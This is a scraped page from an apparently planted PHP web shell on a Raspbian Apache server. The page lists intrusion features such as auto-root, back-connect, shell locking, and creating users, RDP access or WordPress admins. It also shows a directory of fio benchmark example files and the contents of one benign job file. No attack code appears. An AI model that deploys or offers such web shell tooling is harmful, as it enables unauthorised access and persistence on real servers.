Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
fio /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
1mbs_clients.fio
879
B
-rw-r--r--
aio-read.fio
205
B
-rw-r--r--
backwards-read.fio
137
B
-rw-r--r--
basic-verify.fio
377
B
-rw-r--r--
butterfly.fio
344
B
-rw-r--r--
cpp_null.fio
102
B
-rw-r--r--
cpuio.fio
75
B
-rw-r--r--
cross-stripe-verify.fio
747
B
-rw-r--r--
dev-dax.fio
1.06
KB
-rw-r--r--
disk-zone-profile.fio
238
B
-rw-r--r--
e4defrag.fio
527
B
-rw-r--r--
e4defrag2.fio
1.31
KB
-rw-r--r--
enospc-pressure.fio
1.03
KB
-rw-r--r--
falloc.fio
762
B
-rw-r--r--
filecreate-ioengine.fio
569
B
-rw-r--r--
fio-rand-RW.fio
210
B
-rw-r--r--
fio-rand-read.fio
191
B
-rw-r--r--
fio-rand-write.fio
195
B
-rw-r--r--
fio-seq-RW.fio
205
B
-rw-r--r--
fio-seq-read.fio
156
B
-rw-r--r--
fio-seq-write.fio
190
B
-rw-r--r--
fixed-rate-submission.fio
249
B
-rw-r--r--
flow.fio
329
B
-rw-r--r--
fsx.fio
209
B
-rw-r--r--
ftruncate.fio
563
B
-rw-r--r--
gfapi.fio
264
B
-rw-r--r--
gpudirect-rdmaio-client.fio
217
B
-rw-r--r--
gpudirect-rdmaio-server.fio
136
B
-rw-r--r--
http-s3.fio
588
B
-rw-r--r--
http-swift.fio
680
B
-rw-r--r--
http-webdav.fio
337
B
-rw-r--r--
ime.fio
868
B
-rw-r--r--
iometer-file-access-server.fio
439
B
-rw-r--r--
jesd219.fio
596
B
-rw-r--r--
latency-profile.fio
486
B
-rw-r--r--
libhdfs.fio
112
B
-rw-r--r--
libpmem.fio
1.4
KB
-rw-r--r--
mtd.fio
229
B
-rw-r--r--
netio.fio
395
B
-rw-r--r--
netio_multicast.fio
383
B
-rw-r--r--
null.fio
98
B
-rw-r--r--
numa.fio
401
B
-rw-r--r--
pmemblk.fio
2.02
KB
-rw-r--r--
poisson-rate-submission.fio
432
B
-rw-r--r--
rados.fio
567
B
-rw-r--r--
rand-zones.fio
934
B
-rw-r--r--
rbd.fio
543
B
-rw-r--r--
rdmaio-client.fio
179
B
-rw-r--r--
rdmaio-server.fio
108
B
-rw-r--r--
ssd-steadystate.fio
1.14
KB
-rw-r--r--
ssd-test.fio
847
B
-rw-r--r--
steadystate.fio
741
B
-rw-r--r--
surface-scan.fio
399
B
-rw-r--r--
tiobench-example.fio
287
B
-rw-r--r--
waitfor.fio
354
B
-rw-r--r--
zipf.fio
221
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rand-zones.fio
# Sample job file demonstrating how to use zoned random distributionss # to have skewed random accesses. This example has 50% of the accesses # to the first 5% of the file (50/5), 30% to the next 15% (30/15), and # finally 20% of the IO will end up in the remaining 80%. [zones] size=2g direct=1 bs=4k rw=randread norandommap random_distribution=zoned:50/5:30/15:20/ # It's also possible to use zoned_abs to specify absolute sizes. For # instance, if you do: # # random_distribution=zoned_abs:50/10G:30/100G:20/500G # # Then 50% of the access will be to the first 10G of the drive, 30% # will be to the next 100G, and 20% will be to the next 500G. # The above applies to all of reads/writes/trims. If we wanted to do # something differently for writes, let's say 50% for the first 10% # and 50% for the remaining 90%, we could do it by adding a new section # after a a comma. # random_distribution=zoned:50/5:30/15:20/,50/10:50/90
Close